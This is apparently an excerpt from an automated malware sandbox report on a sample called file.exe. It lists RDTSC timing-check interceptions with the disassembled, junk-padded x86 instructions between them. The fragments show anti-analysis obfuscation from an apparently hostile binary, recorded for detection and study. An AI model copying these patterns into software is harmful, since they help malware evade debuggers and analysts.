                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4980100 second address: 4980104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4980104 second address: 4980108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 491011F second address: 4910123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4910123 second address: 4910129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4910129 second address: 4910199 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB0FF775Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F7AB0FF775Eh 0x00000011 adc al, 00000048h 0x00000014 jmp 00007F7AB0FF775Bh 0x00000019 popfd 0x0000001a jmp 00007F7AB0FF7768h 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F7AB0FF775Ch 0x0000002a add cx, 68D8h 0x0000002f jmp 00007F7AB0FF775Bh 0x00000034 popfd 0x00000035 mov ebx, esi 0x00000037 popad 0x00000038 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4910199 second address: 49101C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7AB12EBC8Dh 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49101C2 second address: 49101D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7AB0FF775Ch 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49101D2 second address: 49101D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49101D6 second address: 49101EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7AB0FF775Ah 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49101EC second address: 4910258 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F7AB12EBC94h 0x00000013 add ah, 00000028h 0x00000016 jmp 00007F7AB12EBC8Bh 0x0000001b popfd 0x0000001c jmp 00007F7AB12EBC98h 0x00000021 popad 0x00000022 push dword ptr [ebp+0Ch] 0x00000025 jmp 00007F7AB12EBC90h 0x0000002a push dword ptr [ebp+08h] 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4910258 second address: 491025C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 491025C second address: 4910262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4930D22 second address: 4930D5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 28019839h 0x00000008 jmp 00007F7AB0FF7766h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F7AB0FF7767h 0x00000018 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4930D5D second address: 4930D63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4930D63 second address: 4930D67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4930D67 second address: 4930D6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49308CF second address: 49308D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49308D5 second address: 49308D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49308D9 second address: 4930904 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB0FF775Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7AB0FF7767h 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4930904 second address: 4930931 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7AB12EBC8Dh 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4930931 second address: 4930937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4930937 second address: 493093B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 493093B second address: 493093F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 493078C second address: 49307CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov di, ax 0x0000000e mov cx, A63Fh 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F7AB12EBC97h 0x0000001d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49307CF second address: 49307D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49307D3 second address: 49307D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49307D9 second address: 49307F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 73B1h 0x00000007 mov edx, ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7AB0FF775Fh 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49307F7 second address: 493083E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7AB12EBC8Fh 0x00000008 call 00007F7AB12EBC98h 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F7AB12EBC93h 0x0000001c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 493083E second address: 4930842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4930842 second address: 4930848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4930515 second address: 493056A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov ebx, esi 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F7AB0FF775Eh 0x00000010 sbb ax, 9B98h 0x00000015 jmp 00007F7AB0FF775Bh 0x0000001a popfd 0x0000001b push eax 0x0000001c push edx 0x0000001d pushfd 0x0000001e jmp 00007F7AB0FF7766h 0x00000023 and ecx, 4EE9C5F8h 0x00000029 jmp 00007F7AB0FF775Bh 0x0000002e popfd 0x0000002f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 493056A second address: 4930576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4930576 second address: 493057A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 493057A second address: 4930580 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4970F7C second address: 4970F9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB0FF7761h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4970F9A second address: 4970FA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7AB12EBC8Bh 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4950511 second address: 495059E instructions: 0x00000000 rdtsc 0x00000002 call 00007F7AB0FF7763h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F7AB0FF7769h 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 mov ebx, ecx 0x00000014 pushfd 0x00000015 jmp 00007F7AB0FF7768h 0x0000001a sbb cx, 8998h 0x0000001f jmp 00007F7AB0FF775Bh 0x00000024 popfd 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 jmp 00007F7AB0FF7766h 0x0000002d mov eax, dword ptr [ebp+08h] 0x00000030 pushad 0x00000031 mov cx, 390Dh 0x00000035 mov ebx, esi 0x00000037 popad 0x00000038 and dword ptr [eax], 00000000h 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 495059E second address: 49505A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49505A2 second address: 49505A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49306B8 second address: 49306D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7AB12EBC8Eh 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49306D9 second address: 49306EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ah, 77h 0x0000000e mov dx, 3A32h 0x00000012 popad 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4950339 second address: 495033F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 495033F second address: 4950343 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4950343 second address: 495037E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F7AB12EBC93h 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F7AB12EBC96h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 495037E second address: 4950382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4950382 second address: 495039F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 495039F second address: 49503A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49503A5 second address: 49503A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4970702 second address: 4970706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4970706 second address: 497070A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 497070A second address: 4970710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4970710 second address: 4970716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4970716 second address: 497071A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4970820 second address: 4970833 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 je 00007F7B238AEDC4h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov ch, bh 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4970833 second address: 497085A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB0FF7760h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b call 00007F7AB0FF7760h 0x00000010 pop ecx 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 497085A second address: 4970898 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ecx, eax 0x00000009 jmp 00007F7AB12EBC97h 0x0000000e xor eax, dword ptr [ebp+08h] 0x00000011 pushad 0x00000012 mov ax, bx 0x00000015 mov cl, bl 0x00000017 popad 0x00000018 and ecx, 1Fh 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F7AB12EBC8Fh 0x00000022 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4970898 second address: 497089E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 497089E second address: 49708A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49708A2 second address: 49708E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB0FF775Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ror eax, cl 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F7AB0FF7764h 0x00000014 or si, 32D8h 0x00000019 jmp 00007F7AB0FF775Bh 0x0000001e popfd 0x0000001f push eax 0x00000020 push edx 0x00000021 mov ax, C425h 0x00000025 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49708E2 second address: 497091C instructions: 0x00000000 rdtsc 0x00000002 movzx esi, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 leave 0x00000009 jmp 00007F7AB12EBC8Dh 0x0000000e retn 0004h 0x00000011 nop 0x00000012 mov esi, eax 0x00000014 lea eax, dword ptr [ebp-08h] 0x00000017 xor esi, dword ptr [00C22014h] 0x0000001d push eax 0x0000001e push eax 0x0000001f push eax 0x00000020 lea eax, dword ptr [ebp-10h] 0x00000023 push eax 0x00000024 call 00007F7AB507C4C1h 0x00000029 push FFFFFFFEh 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e pushfd 0x0000002f jmp 00007F7AB12EBC8Ah 0x00000034 and si, 2468h 0x00000039 jmp 00007F7AB12EBC8Bh 0x0000003e popfd 0x0000003f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 497091C second address: 497094A instructions: 0x00000000 rdtsc 0x00000002 mov cx, 7A5Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushfd 0x0000000b jmp 00007F7AB0FF7762h 0x00000010 sub si, F6C8h 0x00000015 jmp 00007F7AB0FF775Bh 0x0000001a popfd 0x0000001b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 497094A second address: 4970972 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 jmp 00007F7AB12EBC92h 0x0000000d ret 0x0000000e nop 0x0000000f push eax 0x00000010 call 00007F7AB507C524h 0x00000015 mov edi, edi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a movsx edx, ax 0x0000001d mov ax, 1735h 0x00000021 popad 0x00000022 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4970972 second address: 4970996 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB0FF775Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e mov esi, 26254F07h 0x00000013 popad 0x00000014 mov di, cx 0x00000017 popad 0x00000018 push eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c mov al, dh 0x0000001e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4970996 second address: 49709E3 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7AB12EBC8Eh 0x00000008 xor ecx, 67808DE8h 0x0000000e jmp 00007F7AB12EBC8Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F7AB12EBC95h 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F7AB12EBC8Dh 0x00000026 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 492002E second address: 492005E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB0FF775Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007F7AB0FF775Ch 0x00000013 and cx, 97C8h 0x00000018 jmp 00007F7AB0FF775Bh 0x0000001d popfd 0x0000001e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 492005E second address: 49200DF instructions: 0x00000000 rdtsc 0x00000002 mov ebx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F7AB12EBC94h 0x0000000c adc si, 9A28h 0x00000011 jmp 00007F7AB12EBC8Bh 0x00000016 popfd 0x00000017 popad 0x00000018 push eax 0x00000019 jmp 00007F7AB12EBC99h 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov edi, 65295C1Eh 0x00000027 pushfd 0x00000028 jmp 00007F7AB12EBC8Fh 0x0000002d sub eax, 74F308CEh 0x00000033 jmp 00007F7AB12EBC99h 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49200DF second address: 49200E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49200E5 second address: 49200E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49200E9 second address: 492013E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB0FF7763h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F7AB0FF7766h 0x00000012 and esp, FFFFFFF8h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov dx, 1FC0h 0x0000001c jmp 00007F7AB0FF7769h 0x00000021 popad 0x00000022 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 492013E second address: 49201DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F7AB12EBC8Ah 0x00000012 sub ecx, 40B11868h 0x00000018 jmp 00007F7AB12EBC8Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F7AB12EBC98h 0x00000024 sbb cl, FFFFFFC8h 0x00000027 jmp 00007F7AB12EBC8Bh 0x0000002c popfd 0x0000002d popad 0x0000002e pushfd 0x0000002f jmp 00007F7AB12EBC98h 0x00000034 sub eax, 6CE96D28h 0x0000003a jmp 00007F7AB12EBC8Bh 0x0000003f popfd 0x00000040 popad 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F7AB12EBC94h 0x00000049 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49201DF second address: 49201E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49201E5 second address: 49201E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49201E9 second address: 49202A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 jmp 00007F7AB0FF7769h 0x0000000e xchg eax, ebx 0x0000000f jmp 00007F7AB0FF775Eh 0x00000014 push eax 0x00000015 pushad 0x00000016 push eax 0x00000017 pushad 0x00000018 popad 0x00000019 pop edx 0x0000001a popad 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F7AB0FF7762h 0x00000023 add cx, 1F78h 0x00000028 jmp 00007F7AB0FF775Bh 0x0000002d popfd 0x0000002e pushfd 0x0000002f jmp 00007F7AB0FF7768h 0x00000034 xor esi, 002CB9D8h 0x0000003a jmp 00007F7AB0FF775Bh 0x0000003f popfd 0x00000040 popad 0x00000041 mov ebx, dword ptr [ebp+10h] 0x00000044 pushad 0x00000045 mov esi, 090CCEABh 0x0000004a pushfd 0x0000004b jmp 00007F7AB0FF7760h 0x00000050 and ax, 0438h 0x00000055 jmp 00007F7AB0FF775Bh 0x0000005a popfd 0x0000005b popad 0x0000005c xchg eax, esi 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 mov bx, 6CB2h 0x00000064 popad 0x00000065 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49202A8 second address: 49202FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7AB12EBC96h 0x00000009 sbb esi, 49D83DC8h 0x0000000f jmp 00007F7AB12EBC8Bh 0x00000014 popfd 0x00000015 mov di, ax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push esi 0x00000020 pop edx 0x00000021 pushfd 0x00000022 jmp 00007F7AB12EBC8Ah 0x00000027 sbb ax, 4028h 0x0000002c jmp 00007F7AB12EBC8Bh 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49202FD second address: 4920362 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, A6CAh 0x00000007 movsx ebx, si 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, esi 0x0000000e pushad 0x0000000f mov dx, cx 0x00000012 push ecx 0x00000013 mov ecx, ebx 0x00000015 pop edx 0x00000016 popad 0x00000017 mov esi, dword ptr [ebp+08h] 0x0000001a jmp 00007F7AB0FF775Ah 0x0000001f xchg eax, edi 0x00000020 pushad 0x00000021 push eax 0x00000022 pop edi 0x00000023 jmp 00007F7AB0FF7766h 0x00000028 popad 0x00000029 push eax 0x0000002a pushad 0x0000002b pushad 0x0000002c mov bx, E3E2h 0x00000030 call 00007F7AB0FF7763h 0x00000035 pop esi 0x00000036 popad 0x00000037 mov ecx, ebx 0x00000039 popad 0x0000003a xchg eax, edi 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4920362 second address: 492037E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
